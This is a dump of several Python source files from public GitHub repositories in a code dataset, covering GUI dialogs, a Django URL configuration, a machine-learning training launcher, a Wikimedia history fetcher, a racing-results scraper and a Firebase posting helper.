self.SetSizer(self.vboxParent)\n\n self.cb_list = self.filter_port()\n base = os.path.abspath(os.path.dirname(__file__))\n self.SetIcon(wx.Icon(base+\"/icons/\"+IMG_ICON))\n \n 
self.UpdateData()\n\n        self.Show()\n        self.Layout()\n\n\n    #--------------------- ---EVENT BIND--- #---------------------\n    def filter_port(self):\n        \"\"\"\n        Filter the COM port list, removing UI-supported switch devices\n        that match the known VID and PID values.\n        Args:\n            No argument\n        Return:\n            port_name - list of available port numbers and serial number of \n            the 2101 \n        \"\"\"\n        usb_hwid_str = [\"USB VID:PID=045E:0646\", \"USB VID:PID=2341:0042\"]\n        comlist = serial.tools.list_ports.comports()\n        port_name = []\n\n        for port, desc, hwid in sorted(comlist):\n            res = [True for gnhwid in usb_hwid_str if(gnhwid in hwid)]\n            if(not res):\n                port_name.append(port)\n        return port_name\n    \n    \n    def InitSelectionType(self):\n        self.hboxdr6 = wx.BoxSizer(wx.HORIZONTAL)\n        self.hboxdrn = wx.BoxSizer(wx.HORIZONTAL)\n\n        bc = wx.StaticBox(self, -1, \"Settings\", size = (400, 200))\n        self.vboxRead = wx.StaticBoxSizer(bc, wx.VERTICAL)\n        self.rbtn_ser = wx.RadioButton(self, -1, label='Serial',style = wx.RB_GROUP )\n        self.rbtn_tcp = wx.RadioButton(self, -1, label='Network(TCP)')\n        self.btn_savetype = wx.Button(self, -1, label='Save', size= (65,25))\n        \n        self.ihboxdr6 = wx.BoxSizer(wx.HORIZONTAL)\n        \n        self.ihboxdr6.Add(self.rbtn_ser, flag=wx.LEFT, border=10)\n        self.ihboxdr6.Add(self.rbtn_tcp, flag=wx.LEFT, border = 10)\n        self.ihboxdr6.Add(self.btn_savetype, flag=wx.LEFT, border=30)\n        \n        self.hboxdr6.Add(self.ihboxdr6, flag=wx.ALIGN_CENTER_VERTICAL)\n\n        self.st_nameSut = wx.StaticText(self, -1, \"Name of DUT\")\n        self.tc_nameSut = wx.TextCtrl(self, -1, \" \", size = (135, 23))\n        self.ihboxdrn = wx.BoxSizer(wx.HORIZONTAL)\n        self.ihboxdrn.Add(self.st_nameSut, flag=wx.LEFT, border=10)\n        self.ihboxdrn.Add(self.tc_nameSut, flag=wx.LEFT, border=10)\n        self.hboxdrn.Add(self.ihboxdrn, flag=wx.ALIGN_CENTER_VERTICAL)\n\n        self.vboxRead.AddMany([ \n            (self.hboxdr6, 1, wx.EXPAND | wx.ALL, 5),\n            (self.hboxdrn, 1, wx.EXPAND | wx.ALL, 5)\n            ])\n\n        self.btn_savetype.Bind(wx.EVT_BUTTON, self.SaveTypeName)\n\n        self.rbtn_ser.Bind(wx.EVT_RADIOBUTTON, self.OnSerial)\n        self.rbtn_tcp.Bind(wx.EVT_RADIOBUTTON, self.OnNetwork)\n\n        self.tc_nameSut.SetValue(self.dut[self.dut_key][\"name\"])\n\n\n    def InitTcpConfig(self):\n        ab = wx.StaticBox(self, -1, \"TCP Settings\", size = (400, 200))\n        self.vboxTcp = wx.StaticBoxSizer(ab, wx.VERTICAL)\n        self.st_tcp = wx.StaticText(self, -1, \"Will be implemented in future\", size = (180, 15))\n\n        self.hboxtcp = wx.BoxSizer(wx.HORIZONTAL)\n\n        self.hboxtcp.Add(self.st_tcp, flag=wx.LEFT, border=10)\n\n        self.vboxTcp.AddMany([\n            (self.hboxtcp, 1, wx.EXPAND | wx.ALL, 5),\n            ])\n\n    def InitSerialConfig(self):\n        ab = wx.StaticBox(self, -1, \"COM Port Settings\", size = (400, 200))\n        self.vboxSerial = wx.StaticBoxSizer(ab, wx.VERTICAL)\n        self.cb_list = self.filter_port()\n        cb_brate = [\"9600\", \"19200\", \"38400\", \"57600\", \"115200\"]\n        cb_dbits = [\"5\",\"6\",\"7\",\"8\"]\n        cb_sbits = [\"1\", \"1.5\", \"2\"]\n        cb_parity = [\"Even\", \"Mark\", \"None\", \"Odd\", \"Space\"]\n        cb_pechar = [\"(ignore)\", \"35 ('#')\", \"42 ('*')\", \"63 ('?')\"]\n\n        self.hboxdrx = wx.BoxSizer(wx.HORIZONTAL)\n        self.hboxdr2 = wx.BoxSizer(wx.HORIZONTAL)\n        self.hboxdr3 = wx.BoxSizer(wx.HORIZONTAL)\n        self.hboxdr4 = wx.BoxSizer(wx.HORIZONTAL)\n        self.hboxdr5 = wx.BoxSizer(wx.HORIZONTAL)\n\n        self.st_port = wx.StaticText(self, -1, \"Select Port \", size = (60, 15))\n        self.cb_list = [\" \"]\n        self.cb_switch = wx.ComboBox(self, -1, choices = self.cb_list, size = (65,-1))\n        self.btn_ref = wx.Button(self, -1, \"Refresh\", (-1, -1))\n        \n        self.ihboxdr2 = 
wx.BoxSizer(wx.HORIZONTAL)\n self.ihboxdr2.Add(self.st_port, flag=wx.LEFT , border=0)\n self.ihboxdr2.Add(self.cb_switch, flag=wx.LEFT, border = 10)\n self.ihboxdr2.Add(self.btn_ref, flag=wx.LEFT, border = 30)\n\n self.hboxdr2.Add(self.ihboxdr2, flag=wx.LEFT | wx.ALIGN_CENTER_VERTICAL, border= 10)\n self.hboxdr2.Add(0,1,0)\n\n self.st_baud = wx.StaticText(self, -1, \"Baud Rate \", size = (60, 15))\n self.st_databits = wx.StaticText(self, -1, \"Data Bits\")\n \n self.cb_baud = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices=cb_brate)\n self.cb_Databits = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices = cb_dbits)\n\n self.ihboxdr3 = wx.BoxSizer(wx.HORIZONTAL)\n \n self.ihboxdr3.Add(self.st_baud, flag=wx.LEFT, border=10)\n self.ihboxdr3.Add(self.cb_baud, flag=wx.LEFT, border = 10)\n self.ihboxdr3.Add(self.st_databits, flag=wx.LEFT, border=30)\n self.ihboxdr3.Add(self.cb_Databits, flag=wx.LEFT, border = 10)\n self.hboxdr3.Add(self.ihboxdr3, flag=wx.ALIGN_CENTER_VERTICAL)\n \n self.ihboxdr4 = wx.BoxSizer(wx.HORIZONTAL)\n self.st_Parity = wx.StaticText(self, -1, \"Parity \", size = (60, 15))\n self.st_StopBits = wx.StaticText(self, -1, \"Stop Bits\")\n \n self.cb_Parity = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices=cb_parity)\n self.cb_StopBits = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices=cb_sbits)\n \n self.ihboxdr4.Add(self.st_Parity, flag=wx.LEFT, border=10)\n self.ihboxdr4.Add(self.cb_Parity, flag=wx.LEFT, border = 10)\n self.ihboxdr4.Add(self.st_StopBits, flag=wx.LEFT, border=30)\n self.ihboxdr4.Add(self.cb_StopBits, flag=wx.LEFT, border = 10)\n self.hboxdr4.Add(self.ihboxdr4, flag=wx.ALIGN_CENTER_VERTICAL)\n \n self.ihboxdrx = wx.BoxSizer(wx.HORIZONTAL)\n self.st_pechar = wx.StaticText(self, -1, \"Parity Error Char.\")\n self.cb_pechar = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices=cb_pechar)\n self.ihboxdrx.Add(self.st_pechar, flag=wx.LEFT, border=10)\n self.ihboxdrx.Add(self.cb_pechar, flag=wx.LEFT, border = 10)\n self.hboxdrx.Add(self.ihboxdrx, flag=wx.ALIGN_CENTER_VERTICAL)\n\n self.ihboxdr5 = wx.BoxSizer(wx.HORIZONTAL)\n self.btn_saveser = wx.Button(self, -1, \"Save\", size = (65, 25))\n self.ihboxdr5.Add(self.btn_saveser, flag=wx.LEFT, border = 140)\n self.hboxdr5.Add(self.ihboxdr5, flag=wx.ALIGN_CENTER_VERTICAL )\n\n self.vboxSerial.AddMany([\n (self.hboxdr2, 1, wx.EXPAND | wx.ALL, 5),\n (self.hboxdr3,1,wx.EXPAND | wx.ALL, 5),\n (self.hboxdr4,1,wx.EXPAND | wx.ALL, 5),\n (self.hboxdrx,1,wx.EXPAND | wx.ALL, 5),\n (self.hboxdr5,1,wx.EXPAND | wx.ALL, 5),\n ])\n\n self.InitSelectionCtrl()\n\n def InitDataToWatch(self):\n self.hboxdr7 = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_ap = wx.BoxSizer(wx.HORIZONTAL)\n self.hboxdr8 = wx.BoxSizer(wx.HORIZONTAL)\n\n cb_action = [\"stop sequence\", \"count match\"]\n\n ca = wx.StaticBox(self, -1, \"Data to Watch\", size = (400, 200))\n self.vboxLog = wx.StaticBoxSizer(ca, wx.VERTICAL)\n\n self.ihboxdr7 = wx.BoxSizer(wx.HORIZONTAL) \n self.tc_data = wx.TextCtrl(self, 0, \"\", style = wx.TE_MULTILINE,\n size = (300,90)) \n self.hboxdr7.Add(self.tc_data, flag=wx.LEFT | \n wx.ALIGN_CENTER_VERTICAL, border=10) \n self.btn_savedtow = wx.Button(self, -1, \"Save\", size = (65, 25))\n self.hboxdr8.Add(self.btn_savedtow, flag=wx.LEFT | \n wx.ALIGN_CENTER_VERTICAL, border=120)\n\n self.st_action = wx.StaticText(self, -1, \"Match action\")\n self.cb_action = wx.ComboBox(self,\n size=(130,-1),\n style = wx.TE_PROCESS_ENTER, 
choices=cb_action)\n\n        self.hbox_ap.Add(self.st_action, flag=wx.LEFT, border=10)\n        self.hbox_ap.Add(self.cb_action, flag=wx.LEFT, border = 10)\n\n        self.vboxLog.AddMany([\n            (self.hboxdr7, 1, wx.EXPAND | wx.ALL),\n            ((0,20), 0, wx.EXPAND),\n            (self.hbox_ap, 1, wx.EXPAND | wx.ALL),\n            (self.hboxdr8, 1, wx.EXPAND | wx.ALL)\n            ])\n\n        self.btn_savedtow.Bind(wx.EVT_BUTTON, self.SaveDataToWatch)\n\n        faultList = None\n        action = None\n        try:\n            faultList = self.dut[self.dut_key][\"faultseq\"]\n            action = self.dut[self.dut_key][\"action\"]\n        except:\n            faultList = []\n            action = \"None\"\n\n        self.cb_action.SetValue(action)\n\n        faultstr = []\n        for fault in faultList:\n            faultstr.append(' \"'+fault+'\"')\n\n        mystr = ','.join(map(str, faultstr))\n\n        self.tc_data.SetValue(mystr)\n\n    def InitSelectionCtrl(self):\n        serkeys = list(self.dut_settings.keys())\n        if(len(serkeys) == 0):\n            self.dut_settings = self.dut[self.dut_key][\"default\"][\"serial\"]\n        \n        self.cb_switch.SetValue(self.dut_settings[\"port\"])\n        self.cb_baud.SetValue(self.dut_settings[\"baud\"])\n        self.cb_Parity.SetValue(self.dut_settings[\"parity\"])\n        self.cb_Databits.SetValue(str(self.dut_settings[\"databits\"]))\n        self.cb_pechar.SetValue(self.dut_settings[\"parerrcheck\"])\n        self.cb_StopBits.SetValue(str(self.dut_settings[\"stopbits\"]))\n        \n        self.btn_ref.Bind(wx.EVT_BUTTON, self.RefreshConfig)\n        self.btn_saveser.Bind(wx.EVT_BUTTON, self.SaveConfig)\n\n    def SaveTypeName(self, event):\n        type = \"tcp\"\n        name = self.tc_nameSut.GetValue()\n        if(self.rbtn_ser.GetValue()):\n            type = \"serial\"\n\n        self.dut[self.dut_key][\"name\"] = name\n        self.dut[self.dut_key][\"interface\"] = type\n        \n        configdata.set_sut_base_data(self.dut)\n        self.save_done_dialog(\"DUT name saved\")\n        \n    def SaveDataToWatch(self, event):\n        fadata = self.tc_data.GetValue()\n        fault_list = re.findall(r'\"([^\"]*)\"', fadata)\n\n        action = self.cb_action.GetValue()\n        \n        findict = {self.dut_key : {\"faultseq\": fault_list, \"action\": action}}\n        \n        configdata.set_sut_watch_data(findict)\n        self.top.updt_dut_config(findict)\n        self.save_done_dialog(\"Data config saved\")\n\n    def UpdateData(self):\n        \n        if(self.dut_type == \"serial\"):\n            self.rbtn_ser.SetValue(True)\n            self.vboxParent.Hide(self.vboxTcp)\n        else:\n            self.rbtn_tcp.SetValue(True)\n            self.vboxParent.Hide(self.vboxSerial)\n        \n    def OnSerial(self, event):\n        btn = event.GetEventObject()\n        \n    def OnNetwork(self, event):\n        btn = event.GetEventObject()\n\n    def Onselectcom(self, e):\n        self.cb = e.GetEventObject()\n\n    def Onselectbaud(self, e):\n        self.cb = e.GetEventObject()\n    \n    def Onselectdatabits(self, e):\n        self.cb = e.GetEventObject()\n    \n    def Onselectstopbits(self, e):\n        self.cb = e.GetEventObject()\n\n    def SaveConfig(self, e):\n        strcom = self.cb_switch.GetValue()\n        strbr = self.cb_baud.GetValue()\n        strdb = self.cb_Databits.GetValue()\n        strpar = self.cb_Parity.GetValue()\n        strsb = self.cb_StopBits.GetValue()\n        strpec = self.cb_pechar.GetValue()\n\n        dutconfig = {\"port\": strcom, \"baud\": strbr, \"databits\": strdb, \n                     \"parity\": strpar, \"stopbits\": strsb, \"parerrcheck\": strpec}\n\n        findict = {self.dut_key : {\"serial\": dutconfig}}\n        \n        configdata.set_sut_config_data(findict)\n        self.top.updt_dut_config(findict)\n\n        self.save_done_dialog(\"Serial config saved\")\n        \n    def RefreshConfig(self, e):\n        self.cb_list = self.filter_port()\n        self.cb_switch.Clear()\n        for cport in self.cb_list:\n            self.cb_switch.Append(cport)\n        self.cb_switch.SetSelection(0)\n\n    def save_config_data(self, cdata):\n        self.top.save_config_data(cdata)\n\n    def read_config_data(self):\n        
return self.top.get_config_data()\n\n    def save_done_dialog(self, msg):\n        title = (\"DUT Config Dialog\")\n        dlg = wx.MessageDialog(self, msg, title, wx.OK)\n        dlg.ShowModal()","repo_name":"mcci-usb/Cricket","sub_path":"src/dutConfigDialog.py","file_name":"dutConfigDialog.py","file_ext":"py","file_size_in_byte":13982,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
+{"seq_id":"39966302380","text":"import argparse\nimport os\nimport train\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')\nparser.add_argument('--log_dir', default='log', help='Log dir [default: log]')\nparser.add_argument('--num_class', type=int, default=13, help='number of classes')\nparser.add_argument('--num_point', type=int, default=4096, help='Point number [default: 4096]')\nparser.add_argument('--max_epoch', type=int, default=50, help='Epoch to run [default: 50]')\nparser.add_argument('--batch_size', type=int, default=15, help='Batch Size during training [default: 15]')\nparser.add_argument('--learning_rate', type=float, default=0.001, help='Initial learning rate [default: 0.001]')\nparser.add_argument('--momentum', type=float, default=0.9, help='Initial momentum [default: 0.9]')\nparser.add_argument('--optimizer', default='adam', help='adam or momentum [default: adam]')\nparser.add_argument('--decay_step', type=int, default=300000, help='Decay step for lr decay [default: 300000]')\nparser.add_argument('--decay_rate', type=float, default=0.5, help='Decay rate for lr decay [default: 0.5]')\nparser.add_argument('--test_area', type=int, default=5, help='Which area to use for test, option: 1-6 [default: 5]')\nparser.add_argument('--data_path', type=str, default='../Data/S3DIS/train_dataset', help='data path')\nparser.add_argument('--roomlist_file', type=str, default='../Data/S3DIS/train_dataset/room_filelist.txt', help='The file which records the room name of each training sample')\nargs = parser.parse_args()\n\n\n# graph_inf contains parameters for graph building and coarsening\ngraph_inf = {'stride_list': [4, 4, 4, 2], #can be seen as the downsampling rate\n             'radius_list': [0.1, 0.2, 0.4, 0.8, 1.6], # radius for neighbor points searching \n             'maxsample_list': [12, 21, 21, 21, 12] #number of neighbor points for each layer\n}\n\n# number of units for each mlp layer\nforward_parm = [\n    [ [32,32,64], [64] ],\n    [ [64,64,128], [128] ],\n    [ [128,128,256], [256] ],\n    [ [256,256,512], [512] ],\n    [ [256,256], [256] ]\n]\n\n# for feature interpolation stage \nupsample_parm = [\n    [128, 128],\n    [128, 128],\n    [256, 256],\n    [256, 256]\n]\n\n# parameters for fully connected layer\nfullconect_parm = 128\n\nnet_inf = {'forward_parm': forward_parm,\n           'upsample_parm': upsample_parm,\n           'fullconect_parm': fullconect_parm\n}\n\n\nif not os.path.exists(args.log_dir): os.mkdir(args.log_dir)\nos.system('cp run.py %s' % (args.log_dir)) # back up parameter info\nos.system('cp train.py %s' % (args.log_dir)) # back up parameter info\nos.system('cp ../utils/pcnet_util.py %s' % (args.log_dir)) # back up parameter info\nos.system('cp ../utils/model.py %s' % (args.log_dir)) # back up parameter info\ntrain.train(args, graph_inf, net_inf)\n","repo_name":"wleigithub/GACNet","sub_path":"net_S3DIS/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"52"}
+{"seq_id":"15541266384","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# 
Author : evilbinary.org\n# E-mail : rootntsd@gmail.com\n# Date : 14/10/1 11:21:19\n# Desc : URL definitions\n\nfrom django.conf.urls import *\nfrom blog import views\nfrom django.conf import settings\nfrom blog.views import * \nfrom django.contrib import admin\nfrom feeds import ArticlesFeed,CommentsFeed\n\nurlpatterns= patterns('blog.views',\n        url(r'^$','index'),\n        url(r'^blog/','index'),\n        url(r'^archive/(\\d{4})/(\\d{1,2})/$','archive'),\n        url(r'^article/(\\d+)/$', 'article'),\n        url(r'^articles/(\\d{4})/$', 'year_archive'),\n        url(r'^articles/(\\d{4})/(\\d{2})/$','month_archive'),\n        url(r'^articles/(\\d{4})/(\\d{2})/(\\d+)/$', 'article_detail'),\n        url(r'^pages(?P<page_number>\\d+)/$', 'pages'),\n        url(r'^pages/$', 'pages'),\n        url(r'^pages/(?P<page_number>\\d+)/$', 'pages'),\n        url(r'^page/(?P<page_number>\\d+)$', 'page'),\n        # url(r'^test(?P<page_number>\\d+)/$', 'page'),\n        url(r'^comment','comment'),\n        url(r'^search/$','search'),\n        url(r'^cat/(?P<cat_id>\\d+)$','cat'),\n        url(r'^archives/(?P<article_id>\\d+)/$','archives'),\n        url(r'^archives$','archives'),\n        url(r'^feeds/rss2$',ArticlesFeed()),\n        url(r'^feeds/comments-rss2$',CommentsFeed()),\n        url(r'^feeds/(?P<name>\\S+)$','feed'),\n        url(r'^test$','test'),\n        url(r'^page_expir$','page_expir'),\n        \n        )\n","repo_name":"evilbinary/myblog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"52"}
+{"seq_id":"20701213624","text":"import traceback\n\nfrom qtpy.QtCore import Slot\nfrom qtpy.QtCore import Qt\nfrom qtpy.QtGui import QDoubleValidator\nfrom qtpy.QtWidgets import QDialog, QFileDialog\nfrom qtpy.QtWidgets import QMessageBox\nfrom qtpy.QtWidgets import QTableWidgetItem\nfrom qtpy.QtWidgets import QComboBox\n\nfrom nezzle.ui.ui_opennetworkdialog import Ui_OpenNetworkDialog\nfrom nezzle.io import read_metadata\nfrom nezzle.graphics.arrows.arrowclassfactory import ArrowClassFactory\n\n\nclass OpenNetworkDialog(QDialog, Ui_OpenNetworkDialog):\n\n    def __init__(self, parent=None):\n        super().__init__(parent=parent)\n        self.setupUi(self)\n\n        self.setWindowTitle(\"Open a network file\")\n        self.setWindowFlags(self.windowFlags() & ~Qt.WindowContextHelpButtonHint)\n\n        validator_double = QDoubleValidator()\n        validator_double.setBottom(0.0)\n\n        # Set TableWidget for edge header mapping\n        self.ui_edgeHeadMappingTable.setColumnCount(3)\n        self.ui_edgeHeadMappingTable.setHorizontalHeaderLabels([\"Count\", \"Interaction\", \"Head\"])\n\n        # Set head selection QComboBox\n        self._available_heads = ArrowClassFactory.get_available_heads()\n        self._head_selections = {}\n\n        # Edge signal and slot\n        self.ui_openButton.released.connect(self.on_open_button_released)\n        self.ui_reloadButton.released.connect(self.on_reload_button_released)\n        self.ui_buttonBox.accepted.connect(self.on_accepted)\n        self.ui_buttonBox.rejected.connect(self.on_rejected)\n\n        # TODO: Implement tail mapping\n        self.ui_edgeTailMappingTable.setColumnCount(3)\n        self.ui_edgeTailMappingTable.setHorizontalHeaderLabels([\"Count\", \"Interaction\", \"Tail\"])\n        self.ui_edgeTailMappingTable.setItem(0, 0, QTableWidgetItem(\"Currently Not Supported\"))\n\n        self.ui_edgeTailMappingTable.setDisabled(True)\n\n    @Slot()\n    def on_open_button_released(self):\n        try:\n            dialog = QFileDialog(self)\n            dialog.setWindowTitle(\"Open a network file\")\n            dialog.setAcceptMode(QFileDialog.AcceptOpen)\n            dialog.setNameFilters([self.tr(\"Text files (*.sif *.cx *.nzj *.json)\")])\n            dialog.setFileMode(QFileDialog.ExistingFile)\n            if dialog.exec() == QDialog.Accepted:\n                fpath = 
dialog.selectedFiles()[0]\n self.ui_filePathEdit.setText(fpath)\n self.on_reload_button_released()\n # end of if\n except Exception as err:\n print(err)\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setWindowTitle(\"Open a network file\")\n msg.setText(\"Invalid file type or file contents:\\n\\n%s\"%(traceback.format_exc()))\n msg.exec()\n # end of except\n\n @Slot()\n def on_reload_button_released(self):\n fpath = self.ui_filePathEdit.text()\n fpath = fpath.strip()\n\n if not fpath or len(fpath) <= 0:\n return\n\n self._head_selections.clear()\n metadata = read_metadata(fpath)\n interactions = metadata[\"INTERACTIONS\"]\n num_rows = len(interactions)\n self.ui_edgeHeadMappingTable.setRowCount(num_rows)\n for i, (interaction_name, count) in enumerate(interactions.items()):\n # Column (0): Count of each interaction\n count_item = QTableWidgetItem(str(count))\n count_item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n count_item.setFlags(count_item.flags() ^ Qt.ItemIsEditable)\n self.ui_edgeHeadMappingTable.setItem(i, 0, count_item)\n\n # Column (1): Interaction name\n interaction_item = QTableWidgetItem(interaction_name)\n interaction_item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n count_item.setFlags(count_item.flags() ^ Qt.ItemIsEditable)\n self.ui_edgeHeadMappingTable.setItem(i, 1, interaction_item)\n\n # Column (2): QComboBox for selecting heads\n cb = QComboBox()\n cb.addItems(self._available_heads)\n if interaction_name in self._available_heads:\n index = self._available_heads.index(interaction_name)\n cb.setCurrentIndex(index)\n\n self.ui_edgeHeadMappingTable.setCellWidget(i, 2, cb)\n self._head_selections[interaction_name] = cb\n # end of for\n\n self.ui_networkNameEdit.setText(metadata[\"NETWORK_NAME\"])\n\n @Slot()\n def on_accepted(self):\n self._fpath = self.ui_filePathEdit.text()\n self._network_name = self.ui_networkNameEdit.text().strip()\n super().accept()\n\n @Slot()\n def on_rejected(self):\n self.close()\n super().reject()\n\n # Read-only properties\n @property\n def edge_map(self):\n _edge_map = {}\n for interaction_name, cb in self._head_selections.items():\n _edge_map[interaction_name] = cb.currentText()\n return _edge_map\n\n @property\n def fpath(self):\n return self._fpath\n\n @property\n def network_name(self):\n return self._network_name\n\n # @property\n # def act_sym(self):\n # return self._act_sym\n #\n # @property\n # def inh_sym(self):\n # return self._inh_sym\n\n # @property\n # def scene_width(self):\n # return self._scene_width\n #\n # @property\n # def scene_height(self):\n # return self._scene_height\n\n @property\n def no_edge_type(self):\n return self.ui_noEdgeTypeCheck.isChecked()\n# end of class","repo_name":"dwgoon/nezzle","sub_path":"nezzle/dialogs/opennetworkdialog.py","file_name":"opennetworkdialog.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"43475299778","text":"# Includes TodayHistory class, which requests data from Wikimedia.\r\n# Instantiated in main.py and adds text regarding historic events\r\n# from this day in history.\r\n\r\nimport datetime\r\nimport requests\r\nfrom random import choice\r\nimport html\r\nfrom textwrap import fill\r\n\r\ntoday = datetime.datetime.now()\r\ndate = today.strftime(\"%m/%d\")\r\nformat_date = today.strftime(\"%A, %B %d, %Y\")\r\n\r\nurl = \"https://api.wikimedia.org/feed/v1/wikipedia/en/onthisday/all/\"\r\nheaders = {\r\n \"User-Agent\": \"anb.daily email 
(anb2015@gmail.com)\"\r\n}\r\n\r\nresponse = requests.get(url + date, headers=headers)\r\n\r\n\r\nclass TodayHistory:\r\n \"\"\"When instantiated and 'today' attribute added, returns a string\r\n which describes various events on this day in history as requested\r\n and filtered from wikimedia.org\"\"\"\r\n def __init__(self):\r\n self.data = response.json()\r\n self.today = \"- TODAY & ITS HISTORY -\\n\\n\"\r\n self.today += f\"Today is {format_date}.\\n\"\r\n self.get_date()\r\n self.get_birthday()\r\n self.get_holiday()\r\n\r\n def get_date(self):\r\n \"\"\"Adds to the attribute string 'today' germane information\r\n regarding today's place in the calendar.\"\"\"\r\n date_info = self.data[\"holidays\"][-1][\"pages\"][1]\r\n today_number = date_info[\"extract\"]\r\n today_number = fill(today_number, width=65)\r\n self.today += today_number\r\n self.today += \"\\n\\n\"\r\n\r\n def get_birthday(self):\r\n \"\"\"Adds to the attribute 'today' a randomly chosen person from Wikimedia\r\n list of people born today, with a short bio.\"\"\"\r\n birth_dict = choice(self.data[\"births\"])\r\n birth_person = birth_dict[\"pages\"][0][\"normalizedtitle\"]\r\n birth_year = birth_dict[\"year\"]\r\n birth_desc = birth_dict[\"pages\"][0][\"extract\"]\r\n birth_desc = fill(birth_desc, width=65)\r\n birth_desc = html.unescape(birth_desc)\r\n self.today += f\"{birth_person} was born on this day in {birth_year}:\\n\"\r\n self.today += birth_desc\r\n self.today += \"\\n\\n\"\r\n\r\n def get_holiday(self):\r\n \"\"\"Adds to the attribute 'today' information about a holiday observed today,\r\n as gathered from Wikimedia; chosen at random for longer list.\"\"\"\r\n holiday_dict = choice(self.data[\"holidays\"])\r\n holiday_name = holiday_dict[\"pages\"][0][\"normalizedtitle\"]\r\n holiday_desc = holiday_dict[\"pages\"][0][\"extract\"]\r\n holiday_desc = fill(holiday_desc, width=65)\r\n holiday_desc = html.unescape(holiday_desc)\r\n self.today += f\"Today {holiday_name} is recognized:\\n\"\r\n self.today += holiday_desc\r\n","repo_name":"andrewblais/anb-daily-email","sub_path":"1.0.2/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35720621664","text":"from parse_mgr import parseNote\r\nfrom lxml import etree\r\n\r\nclass RaceResult_Parse(parseNote.ParseBase):\r\n\r\n _tableLabel = 'f_tac table_bd draggable'\r\n\r\n def getUrl(self,race_date):\r\n url = 'https://racing.hkjc.com/racing/information/English/Racing/LocalResults.aspx?RaceDate={}'.format(race_date)\r\n return url\r\n\r\n def getOtherUrls(self,page_source):\r\n html = etree.HTML(page_source)\r\n _urlList = html.xpath('//table[@class=\"f_fs12 f_fr js_racecard\"]//td//a/@href')\r\n\r\n return _urlList[:-1]\r\n\r\n def parse_sole_info(self,page_source):\r\n try:\r\n html = etree.HTML(page_source)\r\n race_info = html.xpath('//div[@class=\"race_tab\"]//table')[0]\r\n date_info = html.xpath('//div[@class=\"raceMeeting_select\"]//p//span[@class=\"f_fl f_fs13\"]')[0]\r\n\r\n tempTitle = race_info.xpath('.//tr[@class=\"bg_blue color_w font_wb\"]//td')\r\n tempInfo = race_info.xpath('.//tbody[@class=\"f_fs13\"]//tr')\r\n\r\n raceInfoDict = dict()\r\n date_list = date_info.text.replace('Race Meeting:','').replace('\\xa0','').split(\" \")\r\n raceInfoDict['raceDate'] = date_list[1]\r\n raceInfoDict['raceSite'] = date_list[-2]+date_list[-1]\r\n _, raceInfoDict['raceNo'], raceInfoDict['raceId'] = 
tempTitle[0].text.replace('(','').replace(')','').split(\" \")\r\n\r\n            #tr=0\r\n            #tr=1\r\n            tr1_list = tempInfo[1].xpath('.//td')\r\n            track_list = tr1_list[0].text.split(\"M\")\r\n            raceInfoDict['raceCls'],raceInfoDict['raceDistance'] = track_list[0].replace(' ','').split(\"-\")\r\n            raceInfoDict['raceRate'] = ''\r\n            if len(track_list)>1:\r\n                raceInfoDict['raceRate'] = track_list[1].replace(')','').replace(' - (','')\r\n\r\n            raceInfoDict['raceGo'] = tr1_list[2].text\r\n\r\n            #tr=2\r\n            tr2_list = tempInfo[2].xpath('.//td')\r\n            raceInfoDict['raceName'] = tr2_list[0].text\r\n            raceInfoDict['raceTrack'], raceInfoDict['raceCourse'] = tr2_list[2].text.replace(' ','').split(\"-\")\r\n\r\n            #tr=3\r\n            tr3_list = tempInfo[3].xpath('.//td')\r\n            raceInfoDict['raceBonus'] = tr3_list[0].text.replace('HK$ ','').replace(',','')\r\n            raceInfoDict['raceTotalTime'] = tr3_list[-1].text.replace('(','').replace(')','')\r\n\r\n            #tr=4\r\n            tr4_list = tempInfo[4].xpath('.//td')\r\n            raceInfoDict['raceEndTime'] = tr4_list[-1].text.replace('(', '').replace(')', '')\r\n\r\n            print(raceInfoDict)\r\n\r\n            return raceInfoDict\r\n        except IndexError:\r\n            print('RaceResult_Parse: parse_sole_info error!')\r\n            return\r\n","repo_name":"JudyPhy/spider","sub_path":"lulu_spider/parse_mgr/raceResult_parse.py","file_name":"raceResult_parse.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"9521011590","text":"import json\n\nimport requests\n\nfrom domain.meldung import Meldung\n\n\nclass MeldungRepository:\n    def __init__(self, link_to_firebase):\n        self.link_to_firebase = link_to_firebase\n\n    def post_meldung_to_firebase(self, meldungVar):\n        requests.post(url=self.link_to_firebase, json=meldungVar.to_json())\n\n\nif __name__ == '__main__':\n    # Testing\n    repo = MeldungRepository('https://get-wasted-db-default-rtdb.firebaseio.com/Meldungen.json')\n    meldung = Meldung(2, 2, 2, 2, 2, 6)\n    repo.post_meldung_to_firebase(meldung)\n","repo_name":"jackie35er/getWastedAPI","sub_path":"persistance/meldung_repository.py","file_name":"meldung_repository.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
